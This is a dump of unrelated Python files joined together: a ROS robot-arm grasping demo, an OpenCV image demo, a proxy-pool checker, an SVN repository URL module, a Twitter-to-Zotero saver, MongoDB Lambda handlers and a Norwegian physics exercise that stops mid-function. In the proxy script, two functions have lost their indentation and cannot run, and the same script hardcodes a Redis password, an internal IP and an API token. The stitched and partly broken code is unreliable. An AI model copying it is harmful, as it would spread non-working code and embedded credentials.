        gp.pose.orientation.w = -0.604815599864
        gp.pose.orientation.x = -0.132654186819
        gp.pose.orientation.y = 0.698958888788
        gp.pose.orientation.z = -0.357851126398
        g.grasp_pose = gp
        return g

    def wait_for_mesh_and_save(self):
        """Subscribe (one-shot) to the filtered object pointcloud topic."""
        pinfo("Subscribing to pointcloud to generate mesh")
        self.obj_pc_subscriber = rospy.Subscriber("/cloud_indexed_pc_only", sensor_msgs.msg.PointCloud2 , self.obj_pointcloud_callback)

    def obj_pointcloud_callback(self, msg):
        """Convert the received PointCloud2 into xyz points, build a mesh
        from them (saved as object.stl), then unsubscribe."""
        # pcl::toROSMsg
        pinfo("Pointcloud received")
        cloud = []
        for p in point_cloud2.read_points(msg, skip_nans=True):
            cloud.append([p[0], p[1], p[2]])
        create_mesh_and_save(cloud)
        pinfo("Mesh generated")
        self.obj_pc_subscriber.unregister()
if __name__ == "__main__":
    # Demo entry point: prepare the Niryo One arm, then run the GPD-driven
    # pick-and-place pipeline once per object.
    start_time = datetime.datetime.now()
    rospy.init_node("gpd_pick_and_place")

    print("--- Start Physical Arm ---")
    n = NiryoOne()

    # print("Calibration started !")
    # Calibrate robot first
    #try:
    #    n.calibrate_auto()
    #except NiryoOneException as e:
    #    print e
    print("Make sure calibration is already performed on arm !")
    time.sleep(1)

    # Test learning mode
    n.activate_learning_mode(False)

    # Test gripper 3
    n.change_tool(TOOL_GRIPPER_3_ID)

    # testing to add a box at the eef to simulate a gripper
    # robot = moveit_commander.RobotCommander()
    # scene = moveit_commander.PlanningSceneInterface()
    # group_name = "arm"
    # group = moveit_commander.MoveGroupCommander(group_name)
    # We can get the name of the reference frame for this robot:
    # planning_frame = group.get_planning_frame()
    # print("============ Reference frame: %s" % planning_frame)
    # We can also print the name of the end-effector link for this group:
    # eef_link = group.get_end_effector_link()
    # print("============ End effector: %s" % eef_link)
    # We can get a list of all the groups in the robot:
    # group_names = robot.get_group_names()
    # print("============ Robot Groups:", robot.get_group_names())
    # Sometimes for debugging it is useful to print the entire state of the
    # robot:
    # print("============ Printing robot state")
    # print(robot.get_current_state())
    # print("")

    # Read camera-to-ground transform from yaml file and publish
    # with open('camera_params.yaml', 'r') as infile:
    #     cam_pose = yaml.load(infile)
    # camera_static_transform = subprocess.Popen(
    #     ["rosrun", "tf", "static_transform_publisher", str(cam_pose[0]), str(cam_pose[1]), str(cam_pose[2]),
    #      str(cam_pose[3]), str(cam_pose[4]), str(cam_pose[5]), str(cam_pose[6]), "camera_color_optical_frame", "ground_link", "100"])
    # print("[INFO] Camera-robot link established")

    num_objects = 1
    for i in range (0, num_objects):
        # Subscribe for grasps
        pnp = GpdPickPlace(mark_pose=True)
        pnp.planning.clear()

        # Get the pointcloud from camera, filter it, extract indices and publish it to gpd CNN
        #gpd_prep = GpdGrasps(max_messages=8)
        #gpd_prep.filter_cloud()
        #gpd_prep.publish_indexed_cloud()
        call_pointcloud_filter_service()
        pnp.wait_for_mesh_and_save()

        # Wait for grasps from gpd, wrap them into Grasp msg format and start picking
        selected_grasps = pnp.get_gpd_grasps()
        formatted_grasps = pnp.generate_grasp_msgs(selected_grasps)
        n.open_gripper(TOOL_GRIPPER_3_ID, 200)
        print("Gripper 2 opened")
        successful_grasp = pnp.pick(formatted_grasps, verbose=False)
        n.close_gripper(TOOL_GRIPPER_3_ID, 200)
        print("Gripper 2 closed")

        # Place object with successful grasp pose as the starting point
        pnp.place2(successful_grasp, n)
        #n.open_gripper(TOOL_GRIPPER_3_ID, 200)
        #print("Gripper 2 opened")
        #pnp.return_to_rest(successful_grasp)
        #n.close_gripper(TOOL_GRIPPER_3_ID, 200)
        #print("Gripper 2 closed")
        # pnp.place(successful_grasp)
        # fix_grasp = pnp.get_know_successful_grasp()
        # pnp.place(fix_grasp)
        pinfo("Demo runtime: " + str(datetime.datetime.now() - start_time))

    #static_transform_nodes = [node_name for node_name in get_node_names() if node_name[:27] == '/static_transform_publisher']
    #kill_nodes(static_transform_nodes)
|
import cv2 as cv
import numpy as np

# Load the demo image and display it in an auto-sized window.
src = cv.imread("E:\\gannimei\\PycharmProjects\\opencv_python\\images\\github.jpg")
cv.namedWindow("input", cv.WINDOW_AUTOSIZE)
cv.imshow("input", src)
print(type(src))
print(src.shape)

# Cloning produces an independent copy of the pixel data.
m1 = np.copy(src)

# Plain assignment only creates an alias: m2 shares memory with src,
# so painting src white in the top-left corner also shows up in m2.
m2 = src
src[0:100, 0:100, :] = 255
cv.imshow("m2", m2)

# All-black image with the same shape and dtype as the source.
m3 = np.zeros_like(src)
cv.imshow("m3", m3)

# Single-channel (grayscale) black image.
m4 = np.zeros((512, 512), dtype=np.uint8)
cv.imshow("m4", m4)

# Three-channel image with the blue channel (index 0 in BGR) saturated.
m5 = np.zeros((512, 512, 3), dtype=np.uint8)
m5[..., 0] = 255
cv.imshow("m5", m5)
print(m5.shape)

cv.waitKey(0)
cv.destroyAllWindows()
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
import redis
import urllib2
import time
import os
# 1、每天获取总的ip数(过滤24小时内提取过的),端口设定80 8080 8118 8123 808等
# 目前最大数量450左右
# 2、间隔十分钟左右检查所有ip是否有效,检查6次,查看6次全通的占比,5次全通的占比,以次所有占比情况
# 3、第二天再次操作步骤2,检查ip第二天的有效情况
# 4、第二天再操作步骤1和2
# 问题:当请求数变多时,会出现请求失败的问题
# =>request ip number: 1
# --> len(ips): 454
# Traceback (most recent call last):
# File "get_ip_pool.py", line 114, in <module>
# if redis.getScard("ipPool")>=1000:
# File "get_ip_pool.py", line 38, in main
# with open(ip_file) as f:
# File "get_ip_pool.py", line 22, in get_all_ip
# req = urllib2.Request(url)
# File "C:\Users\tpf\AppData\Local\Continuum\Anaconda2\lib\urllib2.py", line 154, in urlopen
# return opener.open(url, data, timeout)
# File "C:\Users\tpf\AppData\Local\Continuum\Anaconda2\lib\urllib2.py", line 435, in open
# response = meth(req, response)
# File "C:\Users\tpf\AppData\Local\Continuum\Anaconda2\lib\urllib2.py", line 548, in http_response
# 'http', request, response, code, msg, hdrs)
# File "C:\Users\tpf\AppData\Local\Continuum\Anaconda2\lib\urllib2.py", line 473, in error
# return self._call_chain(*args)
# File "C:\Users\tpf\AppData\Local\Continuum\Anaconda2\lib\urllib2.py", line 407, in _call_chain
# result = func(*args)
# File "C:\Users\tpf\AppData\Local\Continuum\Anaconda2\lib\urllib2.py", line 556, in http_error_default
# raise HTTPError(req.get_full_url(), code, msg, hdrs, fp)
# urllib2.HTTPError: HTTP Error 503: Service Temporarily Unavailable
def get_all_ip(max_num=100):
"""
至少获取1000个ip以上才停止
"""
ips = set([])
try:
while True:
url = "http://ttvp.daxiangip.com/ip/?tid=559436287116377&delay=1&category=2&foreign=none&ports=8123,8118,80,8080,808&filter=on&num=30"
#url = "http://ttvp.daxiangip.com/ip/?tid=559436287116377&delay=1&category=2&foreign=none&ports=8123,8118,80,8080,808&num=30"
req = urllib2.Request(url)
res_data = urllib2.urlopen(req)
ip_ports = res_data.read().split("\r\n")
print '=>request ip number:', len(ip_ports)
for ip_port in ip_ports:
ips.add(ip_port)
print '--> len(ips):', len(ips)
if len(ips) > max_num:
break
time.sleep(2)
except:
with open('get_all_ip.txt', 'w') as f:
for one in ips:
print >> f, one
with open('get_all_ip.txt', 'w') as f:
for one in ips:
print >> f, one
def check_ip_valid(ip_file='get_all_ip.txt', retry_num=6, retry_interval=10*60, test_web="https://cn.china.cn"):
    """Probe each proxy from ip_file against test_web over several rounds.

    Each round shells out to curl using the proxy (-x ip:port) and counts
    how often each proxy answered HTTP 200.  Results are written to
    check_ip_valid.txt as "ip:port<TAB>count" lines, followed by a
    histogram of pass counts.

    ip_file        -- file with one "ip:port" per line.
    retry_num      -- number of validation rounds.
    retry_interval -- seconds to sleep between rounds.
    test_web       -- URL fetched through each proxy.
    """
    ip_ports = set([])
    with open(ip_file) as f:
        for line in f:
            ip_ports.add(line.strip())
    print "len(ip_ports):", len(ip_ports)
    ip_pass_cnt = {}  # proxy -> number of rounds it returned HTTP 200
    cnt_retry_num = 0
    while cnt_retry_num < retry_num:
        for ip_port in ip_ports:
            # -s -w %{http_code} makes curl print only the status code.
            s = "curl --connect-timeout 3 -o /dev/null -s -w %{http_code} -x " + ip_port + " " + test_web
            print s
            try:
                ret_code = os.popen(s).read()
                print ret_code
            except:
                #print s
                print 'exception occur'
                continue
            time.sleep(.5)
            if ret_code != '200':
                continue
            if ip_pass_cnt.__contains__(ip_port):
                ip_pass_cnt[ip_port] += 1
            else:
                ip_pass_cnt[ip_port] = 1
        cnt_retry_num += 1
        if cnt_retry_num < retry_num:
            time.sleep(retry_interval)
    with open('check_ip_valid.txt', 'w') as f:
        # Histogram: pass_count -> number of proxies with that count.
        pass_cnt_dict = {}
        for k, v in ip_pass_cnt.items():
            print >> f, "%s\t%d" % (k, v)
            if pass_cnt_dict.__contains__(v):
                pass_cnt_dict[v] += 1
            else:
                pass_cnt_dict[v] = 1
        print >> f, '\t\t\t----------------------频次统计'
        for k, v in pass_cnt_dict.items():
            print >> f, "\t\t\t%s\t%d" % (k, v)
def check_ip_valid_next(pre_file=None, ip_file='get_all_ip.txt', retry_num=6, retry_interval=10*60, test_web="https://cn.china.cn"):
    """Continue a previous check_ip_valid run, carrying over its counts.

    Same validation loop as check_ip_valid, but the pass counters are
    seeded from pre_file (the check_ip_valid.txt output of an earlier
    run, "ip:port<TAB>count" per line) so counts accumulate across runs.
    Output again goes to check_ip_valid.txt.
    """
    ip_ports = set([])
    with open(ip_file) as f:
        for line in f:
            ip_ports.add(line.strip())
    print "len(ip_ports):", len(ip_ports)
    #init ip_pass_cnt
    ip_pass_cnt = {}
    for ip_port in ip_ports:
        ip_pass_cnt[ip_port] = 0
    # Merge counts from the previous run; malformed lines are skipped.
    with open(pre_file) as f:
        for line in f:
            elems = line.rstrip('\n').split('\t')
            if len(elems) != 2:
                continue
            ip_pass_cnt[elems[0]] = int(elems[1])
    print "len(ip_pass_cnt):", len(ip_pass_cnt)
    #print 'ip_pass_cnt', ip_pass_cnt
    cnt_retry_num = 0
    while cnt_retry_num < retry_num:
        for ip_port in ip_ports:
            s = "curl --connect-timeout 3 -o /dev/null -s -w %{http_code} -x " + ip_port + " " + test_web
            print s
            try:
                ret_code = os.popen(s).read()
                print ret_code
            except:
                #print s
                print 'exception occur'
                continue
            time.sleep(.1)
            if ret_code != '200':
                continue
            if ip_pass_cnt.__contains__(ip_port):
                ip_pass_cnt[ip_port] += 1
            else:
                ip_pass_cnt[ip_port] = 1
        cnt_retry_num += 1
        if cnt_retry_num < retry_num:
            time.sleep(retry_interval)
    with open('check_ip_valid.txt', 'w') as f:
        # Histogram: pass_count -> number of proxies with that count.
        pass_cnt_dict = {}
        for k, v in ip_pass_cnt.items():
            print >> f, "%s\t%d" % (k, v)
            if pass_cnt_dict.__contains__(v):
                pass_cnt_dict[v] += 1
            else:
                pass_cnt_dict[v] = 1
        print >> f, '\t\t\t----------------------频次统计'
        for k, v in pass_cnt_dict.items():
            print >> f, "\t\t\t%s\t%d" % (k, v)
def main():
    """Entry point: resume validation using a previous run's counters."""
    #get_all_ip()
    #check_ip_valid(retry_interval=10*60)
    check_ip_valid_next(pre_file='check_ip_valid20170410_12-14.txt', retry_interval=10*60)
def getIp(num):
    """Fetch proxies from the daxiangip API, double-check them with curl,
    and return the survivors as a set of "ip:port" strings.

    num -- stop fetching once at least this many proxies passed the
           first check (evaluated after each batch; at most 5 batches).
    """
    output = set([])
    cnt = 0
    for _i in range(5):
        url = "http://ttvp.daxiangip.com/ip/?tid=559436287116377&delay=1&category=2&foreign=none&ports=8123,8118,80,8080&filter=on&num=10"
        req = urllib2.Request(url)
        res_data = urllib2.urlopen(req)
        res = res_data.read().split("\r\n")
        print len(res),"------->",_i
        # First pass: keep proxies that answer HTTP 200.
        for ip_port in res:
            test = "curl --connect-timeout 3 -o /dev/null -s -w %{http_code} -x "+ip_port+" https://cn.china.cn"
            print test
            ret_code = os.popen(test).read()
            print ret_code,"----"
            if ret_code != '200':
                continue
            output.add(ip_port)
            cnt += 1
        time.sleep(2)
        # once again: re-check the same batch and drop proxies that flake.
        for ip_port in res:
            test = "curl --connect-timeout 3 -o /dev/null -s -w %{http_code} -x "+ip_port+" https://cn.china.cn"
            print test
            ret_code = os.popen(test).read()
            print ret_code,"----"
            if ret_code != '200' and ip_port in output:
                output.remove(ip_port)
                cnt -= 1
        if cnt >= num:
            break
    return output
def update_ip():
try:
redis=RedisConnect("192.168.200.116",6379,4,"mypasshahayou")
count=redis.getScard("ipPool")
if not count:
Ips=getIp(10000)
for i in Ips:
print "------Is insert ip :%s---------"%i
redis.setSadd("ipPool",i)
if redis.getScard("ipPool")>=1000:
break
else:
ipList=redis.getSrandmember("ipPool",80)
for i in ipList:
test = "curl --connect-timeout 3 -o /dev/null -s -w %{http_code} -x "+i+" http://www.hc360.com/"
print test
output = os.popen(test)
num = output.read()
print num,"----"
if int(num) != 200 :
print "xxxxxxxxxxIs delete ip :%sxxxxxxxxxxx"%i
redis.srem("ipPool",i)
Ipss=getIp(10000)
m=0
while m < len(Ipss) :
print redis.getScard("ipPool")
print "------Is update ip :%s---------"%Ipss[m]
redis.setSadd("ipPool",Ipss[m])
m+=1
print "--------------------------Update Ip Success----------------------------"
print "---------------------------Wait for the update, the next update will be in 60 seconds after the----------------------------------------------"
except Exception,e:
redis=RedisConnect("192.168.200.116",6379,4,"mypasshahayou")
count=redis.getScard("ipPool")
print e
#Delete some ip
# Script entry point.
if __name__ == "__main__":
    main()
    #ret = getIp(20)
    #print ret
""" Handles repository layout scheme and package URLs."""
import os
import urlparse
from RepSys import Error, config
from RepSys.svn import SVN
__all__ = ["package_url", "checkout_url", "repository_url", "get_url_revision"]
def layout_dirs():
    """Return the (devel, branches) directory names from configuration.

    Defaults are "cooker" for the development trunk and "updates" for
    the per-release branches; both are path-normalized.
    """
    trunk = os.path.normpath(config.get("global", "trunk-dir", "cooker/"))
    branches = os.path.normpath(config.get("global", "branches-dir", "updates/"))
    return trunk, branches
def get_url_revision(url, retrieve=True):
    """Get the revision from a given URL

    If the URL contains an explicit revision number (URL@REV), just use it
    without even checking if the revision really exists.

    The parameter retrieve defines whether it must ask the SVN server for
    the revision number or not when it is not found in the URL.
    """
    baseurl, rev = split_url_revision(url)
    if rev is None and retrieve:
        # No @REV marker in the URL: ask the server instead.
        rev = SVN().revision(baseurl)
    return rev
def unsplit_url_revision(url, rev):
    """Inverse of split_url_revision: re-attach "@REV" to the URL path.

    Returns the URL unchanged when rev is None.
    """
    if rev is None:
        return url
    parts = list(urlparse.urlparse(url))
    parts[2] = os.path.normpath(parts[2]) + "@" + str(rev)
    return urlparse.urlunparse(parts)
def split_url_revision(url):
    """Returns a tuple (url, rev) from an subversion URL with @REV

    If the revision is not present in the URL, rev is None.
    Raises Error when an @REV suffix is present but is not a
    non-negative integer.
    """
    parsed = list(urlparse.urlparse(url))
    path = os.path.normpath(parsed[2])
    # Only the last path component may carry the @REV marker.
    dirs = path.rsplit("/", 1)
    lastname = dirs[-1]
    newname = lastname
    index = lastname.rfind("@")
    rev = None
    if index != -1:
        newname = lastname[:index]
        rawrev = lastname[index+1:]
        if rawrev:
            try:
                rev = int(rawrev)
                if rev < 0:
                    raise ValueError
            except ValueError:
                raise Error, "invalid revision specification on URL: %s" % url
    # Reassemble the path without the @REV suffix.
    dirs[-1] = newname
    newpath = "/".join(dirs)
    parsed[2] = newpath
    newurl = urlparse.urlunparse(parsed)
    return newurl, rev
def checkout_url(pkgdirurl, branch=None, version=None, release=None,
        releases=False, pristine=False, append_path=None):
    """Get the URL of a branch of the package, defaults to current/

    It tries to preserve revisions in the format @REV.
    """
    parsed = list(urlparse.urlparse(pkgdirurl))
    path, rev = split_url_revision(parsed[2])
    # Flag precedence: releases > version/release > pristine > branch,
    # falling back to current/.
    if releases:
        path = os.path.normpath(path + "/releases")
    elif version:
        assert release is not None
        path = os.path.normpath(path + "/releases/" + version + "/" + release)
    elif pristine:
        path = os.path.join(path, "pristine")
    elif branch:
        path = os.path.join(path, "branches", branch)
    else:
        path = os.path.join(path, "current")
    if append_path:
        path = os.path.join(path, append_path)
    parsed[2] = unsplit_url_revision(path, rev)
    return urlparse.urlunparse(parsed)
def convert_default_parent(url):
    """Removes the cooker/ component from the URL

    Drops the last path component so a legacy default_parent value can
    be used as the repository base URL.
    """
    parsed = list(urlparse.urlparse(url))
    normalized = os.path.normpath(parsed[2])
    parsed[2] = os.path.split(normalized)[0]
    return urlparse.urlunparse(parsed)
def remove_current(pkgdirurl):
    """Strip a trailing "current" component from a package URL, if present.

    The path is normalized either way.
    """
    parsed = list(urlparse.urlparse(pkgdirurl))
    path = os.path.normpath(parsed[2])
    head, tail = os.path.split(path)
    if tail == "current":
        # FIXME this way we will not allow packages to be named "current"
        parsed[2] = head
    else:
        parsed[2] = path
    return urlparse.urlunparse(parsed)
def repository_url(mirrored=False):
    """Return the base repository URL from configuration.

    mirrored -- when True and the use-mirror option is enabled, prefer
                the 'mirror' option over 'repository'.

    Falls back to the legacy default_parent option (minus its trailing
    distro component); raises Error when nothing is configured.
    """
    url = None
    if mirrored and config.getbool("global", "use-mirror", "yes"):
        url = config.get("global", "mirror")
    if url is None:
        url = config.get("global", "repository")
    if not url:
        # compatibility with the default_parent configuration option
        default_parent = config.get("global", "default_parent")
        if default_parent is None:
            raise Error, "you need to set the 'repository' " \
                    "configuration option on repsys.conf"
        url = convert_default_parent(default_parent)
    return url
def package_url(name_or_url, version=None, release=None, distro=None,
        mirrored=True):
    """Returns the absolute package URL

    (Note: despite the old docstring, only the URL is returned, not a
    (url, name) tuple -- see the single return below.)

    @name_or_url: name, relative path, or URL of the package. In case it is
                  a URL, the URL will just be 'normalized'.
    @version: the version to be fetched from releases/ (requires release)
    @release: the release number to be fetched from releases/$version/
    @distro: the name of the repository branch inside updates/
    @mirrored: return an URL based on the mirror repository, if enabled
    """
    from RepSys import mirror
    if "://" in name_or_url:
        # Already a URL: normalize it and strip any trailing current/.
        pkgdirurl = mirror.normalize_path(name_or_url)
        pkgdirurl = remove_current(pkgdirurl)
        if mirror.using_on(pkgdirurl) and not mirrored:
            # Caller wants the real repository, not the mirror.
            pkgdirurl = mirror.relocate_path(mirror.mirror_url(),
                    repository_url(), pkgdirurl)
    else:
        name = name_or_url
        devel_branch, branches_dir = layout_dirs()
        # A distro or an explicit path selects the updates/ area;
        # otherwise the package lives in the development trunk.
        if distro or "/" in name:
            default_branch = branches_dir
            if distro:
                default_branch = os.path.join(default_branch, distro)
        else:
            default_branch = devel_branch # cooker
        path = os.path.join(default_branch, name)
        parsed = list(urlparse.urlparse(repository_url(mirrored=mirrored)))
        parsed[2] = os.path.join(parsed[2], path)
        pkgdirurl = urlparse.urlunparse(parsed)
    return pkgdirurl
def package_name(pkgdirurl):
    """Returns the package name from a package URL

    It takes care of revision numbers (@REV suffixes are stripped).
    """
    path, _rev = split_url_revision(urlparse.urlparse(pkgdirurl)[2])
    return os.path.split(path)[1]
def package_spec_url(pkgdirurl, *args, **kwargs):
    """Returns the URL of the specfile of a given package URL

    The parameters are the same used by checkout_url, except append_path,
    which is overridden to point at SPECS/<name>.spec.
    """
    name = package_name(pkgdirurl)
    kwargs["append_path"] = "SPECS/" + name + ".spec"
    return checkout_url(pkgdirurl, *args, **kwargs)
def distro_branch(pkgdirurl):
    """Tries to guess the distro branch name from a package URL

    Returns the branch name, or None when the URL is not under this
    repository or under neither the devel nor the branches area.
    """
    from RepSys.mirror import same_base
    found = None
    repo = repository_url()
    if same_base(repo, pkgdirurl):
        devel_branch, branches_dir = layout_dirs()
        repo_path = urlparse.urlparse(repo)[2]
        devel_path = os.path.join(repo_path, devel_branch)
        branches_path = os.path.join(repo_path, branches_dir)
        parsed = urlparse.urlparse(pkgdirurl)
        path = os.path.normpath(parsed[2])
        if path.startswith(devel_path):
            # devel_branch must be before branches_dir in order to allow
            # devel_branch to be inside branches_dir, as in /branches/cooker
            _, found = os.path.split(devel_branch)
        elif path.startswith(branches_path):
            comps = path.split("/")
            if branches_path == "/":
                found = comps[1]
            elif len(comps) >= 2: # must be at least branch/pkgname
                # The branch name is the component right after branches_path.
                found = comps[branches_path.count("/")+1]
    return found
|
from keys import *
import webbrowser
import pyautogui
import requests
import argparse
import tweepy
import time
def fetch_urls_from_tweet(api, status_id):
    """Return all link-looking tokens from a tweet's full text.

    Retweets carry the complete text on retweeted_status.full_text;
    ordinary tweets on full_text.
    """
    status = api.get_status(status_id, tweet_mode="extended")
    try:
        text = status.retweeted_status.full_text
    except AttributeError:
        text = status.full_text
    link_prefixes = ("https://", "buff.ly", "t.co", "bit.ly")
    return [token for token in text.split() if token.lower().startswith(link_prefixes)]
def request_url(short_url):
    """Follow redirects of a shortened URL and return the final address.

    Returns None (after printing the error) when the request fails.
    """
    try:
        response = requests.get(short_url, timeout=5)
    except Exception as e:
        print(e)
        return None
    return response.url
def get_extended_url(api, tweet_list):
    """Resolve every URL found in the given tweets to its final address.

    The resolved list (entries may be None on failure) is persisted via
    save_list and returned.
    """
    url_lists = [fetch_urls_from_tweet(api=api, status_id=tid) for tid in tweet_list]
    flat_urls = [url for urls in url_lists for url in urls]
    extended_urls = [request_url(url) for url in flat_urls]
    save_list(inlist=extended_urls)
    return extended_urls
def save_list(inlist):
    """Write the non-None entries of inlist to all_urls.txt, one per line."""
    with open('all_urls.txt', 'w') as fh:
        for item in inlist:
            if item is not None:
                fh.write("%s\n" % item)
def save_to_zotero(url):
    """Open url in the default browser and trigger the Zotero Connector.

    Relies on the Zotero browser extension binding Ctrl+Shift+S to
    "save to Zotero"; the sleeps give the page time to load and the
    save time to complete.
    """
    webbrowser.open(url)
    time.sleep(5)
    pyautogui.hotkey('ctrl', 'shift', 's')
    time.sleep(10)
def run(tweet_ids):
    """Authenticate with Twitter, resolve all URLs from the given tweet
    ids and save each one to Zotero, continuing past per-URL failures.

    Credentials (api_key, api_secret, access_token, access_token_secret)
    come from the keys module star-imported at the top of the file.
    """
    auth = tweepy.OAuthHandler(api_key, api_secret)
    auth.set_access_token(access_token, access_token_secret)
    api = tweepy.API(auth)
    extended_urls = get_extended_url(api=api, tweet_list=tweet_ids)
    for url in extended_urls:
        try:
            save_to_zotero(url=url)
        except Exception as e:
            print(e)
# Command-line entry point.  The input file's first column holds tweet
# URLs; the tweet id is the URL's last path component.  The first line
# (header) is skipped.
parser = argparse.ArgumentParser(description='Save Twitter Bookmarked Papers to Zotero')
parser.add_argument('-i','--input', help='Provide input', required=True)
args = parser.parse_args()
if args.input:
    try:
        with open(args.input, "r") as handle:
            tweet_ids=[i.split(',')[0].split('/')[-1] for i in handle.readlines()[1:]]
        run(tweet_ids=tweet_ids)
    except Exception as e:
        print(e)
else:
    print('Provide an input file')
"""
zbx.exceptions
~~~~~~~~~~~~~~
"""
class ValidationError(ValueError):
    """Raised when a value fails validation."""
class RPCException(Exception):
    """RPC-level error carrying the server's error code and payload.

    The exception message is rendered as "message(code): data"; code
    and data remain accessible as attributes.
    """

    def __init__(self, message, code, data=None):
        detail = '%s(%d): %s' % (message, code, data)
        super(RPCException, self).__init__(detail)
        self.code = code
        self.data = data
|
'''Utils.
Author:
P. Polakovic
'''
def ffs(num):
    '''Return the index of the lowest set bit of num, or None when num == 0.'''
    if num == 0:
        return None
    index = 0
    while not (num >> index) & 1:
        index += 1
    return index
def qalign(num):
    '''Round num up to the next multiple of 8 (no-op if already aligned).'''
    return (num + 0x7) & ~0x7
import pymongo
from bson.json_util import dumps
import json
def get_top_10_by_points(event, context):
    """Lambda handler: the 10 posts with the highest punctuation (score),
    filtered by the event's rank parameter."""
    collection = get_working_collection()
    cursor = get_find_subreddits(event, collection)
    top_posts = cursor.sort("punctuation", pymongo.DESCENDING).limit(10)
    return cursor_to_json(top_posts)
def get_top_10_by_num_comments(event, context):
    """Lambda handler: the 10 posts with the most comments, filtered by
    the event's rank parameter."""
    collection = get_working_collection()
    cursor = get_find_subreddits(event, collection)
    top_posts = cursor.sort("num_comments", pymongo.DESCENDING).limit(10)
    return cursor_to_json(top_posts)
def get_top_10_submitters(event, context):
    """Lambda handler: the 10 authors with the most submissions."""
    collection = get_working_collection()
    pipeline = [
        {"$group": {"_id": {"author": "$author"}, "count": {"$sum": 1}}},
        {"$sort": {"count": -1}},
        {"$limit": 10},
    ]
    return cursor_to_json(collection.aggregate(pipeline=pipeline))
def get_top_10_commenters(event, context):
    """Lambda handler: the 10 authors with the most comments
    (one document per comment after $unwind)."""
    collection = get_working_collection()
    pipeline = [
        {"$unwind": "$comments"},
        {"$group": {"_id": "$comments.author", "count": {"$sum": 1}}},
        {"$sort": {"count": -1}},
        {"$limit": 10},
    ]
    return cursor_to_json(collection.aggregate(pipeline=pipeline))
def get_all_posts_by_user(event, context):
    """Lambda handler: every post submitted by the requested author.

    Returns {} when the event carries no author parameter.
    """
    author = get_query_author(event)
    if author is None:
        return {}
    collection = get_working_collection()
    return cursor_to_json(collection.find({'author': author}))
def get_all_posts_by_user_comments(event, context):
    """Lambda handler: every post the requested author commented on.

    Returns {} when the event carries no author parameter.
    """
    author = get_query_author(event)
    if author is None:
        return {}
    collection = get_working_collection()
    return cursor_to_json(collection.find({"comments": {"$elemMatch": {"author": author}}}))
def get_average_comment_karma_by_user(event, context):
    """Lambda handler: comment count and average comment score for the
    requested author.

    Returns {} when the event carries no author parameter.
    """
    author = get_query_author(event)
    if author is None:
        return {}
    collection = get_working_collection()
    pipeline = [
        {"$unwind": "$comments"},
        {"$group": {
            "_id": "$comments.author",
            "count": {"$sum": 1},
            "avgPunctuation": {"$avg": "$comments.punctuation"},
        }},
        {"$match": {"_id": author}},
    ]
    return cursor_to_json(collection.aggregate(pipeline=pipeline))
def get_query_author(event):
    """Extract the 'author' query parameter from a lambda event dict.

    Returns the author string, or None when the event has no query dict,
    no author entry, or a falsy author value.  Uses dict.get so that a
    missing 'query' or 'author' key no longer raises KeyError (the
    original indexed the dict directly).
    """
    query = event.get('query')
    if not query:
        return None
    return query.get('author') or None
def get_find_subreddits(event, working_collection):
    """Build the find() cursor selected by the event's 'rank' parameter.

    rank == "discussion" -> self posts only  (external_article False)
    rank == "external"   -> link posts only  (external_article True)
    "all" / anything else / absent -> every document

    Uses dict.get so a missing 'query' or 'rank' key falls back to the
    unfiltered query instead of raising KeyError, and removes the
    duplicated trailing find()/return of the original.
    """
    query = event.get('query') or {}
    rank = query.get('rank')
    if rank == "discussion":
        return working_collection.find({'external_article': False})
    if rank == "external":
        return working_collection.find({'external_article': True})
    return working_collection.find()
def cursor_to_json(cursor):
    """Serialize a pymongo cursor to plain Python objects.

    bson's dumps handles Mongo-specific types (ObjectId, dates); the
    round-trip through json.loads yields JSON-safe dicts/lists.
    """
    return json.loads(dumps(cursor))
def get_working_collection():
    """Open the MongoDB collection described by mongo_db.json.

    The JSON file must provide mongo_url, mongo_database and
    mongo_collection.  A new client connection is created on every call.
    """
    with open('mongo_db.json') as data_file:
        data_item = json.load(data_file)
        client = pymongo.MongoClient(data_item["mongo_url"])
        test_database = client.get_database(data_item["mongo_database"])
        working_collection = test_database.get_collection(data_item["mongo_collection"])
    return working_collection
|
"""
Innlevering 1 | Oppgave 5
Kjør programmet ved kommandoen:
python oppg_5.py
Kastet er vertikalt, dvs at ballen kun vil bevege seg langs vertikalaksen(y-aksen).
Setter positiv retning oppover.
Ser bort fra luftmotstand, da er den eneste kraften som virker på ballen i luften vekten, W = mg.
Summen av kreftene er ikke lik 0, så -W = ma <=> -mg = ma <=> a = -g, hvor g = 9.81 m/s^2.
Ut fra bevegelseslikningene, så får vi at
y = y0 + v0*t + 1/2*a*t^2, hvor vi setter nullpunktet i utgangshøyden, altså er y0 = 0, og substituerer -g inn for a. Dette gir
y = v0*t - 1/2*g*t^2
For å finne tiden ballen bruker fra den blir kastet til den lander igjen, så kan vi finne løsningene
for y = 0.
Vi ser at
v0*t = 1/2*g*t^2
som gir løsningene
- t = 0
- t = 2v0/g
Vi er ute etter den siste løsningen, når ballen treffer bakken etter å ha vært i luften.
Vi vet at apex-punktet(det høyeste punktet) på kurven til et kast når vi ser bort fra luftmotstand
er høyden ved t_slutt/2.
"""
import numpy as np
import matplotlib.pylab as plt

# Gravitational acceleration at the Earth's surface, in m/s^2.
g = 9.81
def calculate_time_of_impact(v0, a=-g, y0 = 0):
    """
    For a vertical toss, return the (latest) time at which the object is
    at height zero, i.e. the time of impact after being airborne.

    Solves 0 = y0 + v0*t + (1/2)*a*t**2 with the quadratic formula.
    Note that positive direction is upwards.

    v0 - initial velocity given in meter(s) per second.
    y0 - initial height given in meter(s).
    a - acceleration given in meter(s) per second per second.

    Returns the time of impact in second(s).
    """
    root = (v0**2 - 2*a*y0)**0.5
    candidates = ((-v0 + root)/a, (-v0 - root)/a)
    # max() also covers the double-root case (both candidates equal).
    return max(candidates)
def calculate_height(v0, t, a=-g, y0 = 0):
    """
    For a vertical toss, return the height at time t given the initial
    velocity v0, initial height y0 and the acceleration a.

    Note that positive direction is upwards.

    v0 - initial velocity given in meter(s) per second.
    y0 - initial height given in meter(s).
    a - acceleration given in meter(s) per second per second.
    t - time given in second(s).

    Returns the height at time t in meter(s).
    """
    # Kinematic equation: y(t) = y0 + v0*t + a*t^2 / 2.
    return y0 + v0*t + 0.5*a*t**2
def calculate_max_height(v0_y, a_y=-g, y0 = 0):
    """
    Return the peak height of a vertical toss.

    Without air resistance the apex is reached at exactly half the total
    flight time, so the height is evaluated at time_of_impact / 2.

    v0_y - initial vertical velocity given in meter(s) per second.
    a_y - initial vertical acceleration given in meter(s) per second per second.
    y0 - initial height given in meter(s).
    """
    apex_time = calculate_time_of_impact(v0_y, a_y, y0) / 2
